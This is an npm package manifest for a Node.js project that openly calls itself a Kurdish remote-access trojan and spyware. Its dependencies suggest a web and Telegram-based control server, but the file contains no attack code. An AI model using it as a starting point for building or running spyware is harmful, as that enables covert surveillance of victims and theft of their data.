{
  "name": "7ashashe-v36",
  "version": "36.0.0",
  "description": "7ASHASHE ULTIMATE KURDISH RAT - وەحشی هاک",
  "main": "server.js",
  "scripts": {
    "start": "node server.js",
    "dev": "nodemon server.js"
  },
  "keywords": [
    "7ashashe",
    "rat",
    "spyware",
    "kurdish",
    "hacking"
  ],
  "author": "7ASHASHE",
  "license": "UNLICENSED",
  "private": true,
  "engines": {
    "node": ">=18.0.0",
    "npm": ">=9.0.0"
  },
  "dependencies": {
    "express": "^4.18.2",
    "ws": "^8.14.2",
    "node-telegram-bot-api": "^0.64.0",
    "uuid": "^9.0.1",
    "multer": "^1.4.5-lts.1",
    "body-parser": "^1.20.2",
    "axios": "^1.6.2"
  },
  "devDependencies": {
    "nodemon": "^3.0.1"
  },
  "repository": {
    "type": "git",
    "url": "https://github.com/7ashashe/v36"
  }
}
